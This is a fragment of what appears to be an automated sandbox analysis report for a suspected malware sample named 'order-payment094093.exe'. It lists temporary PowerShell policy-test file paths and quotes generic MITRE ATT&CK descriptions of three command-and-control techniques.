C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3beuwe4e.cac.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50etzmgc.mrp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqel24pw.tmi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4ftytdm.uo5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wejn4eqx.35o.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdxiuybw.hag.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwffkgu0.h2c.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdpzbvd3.40p.ps1

Windows Analysis Report
order-payment094093.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre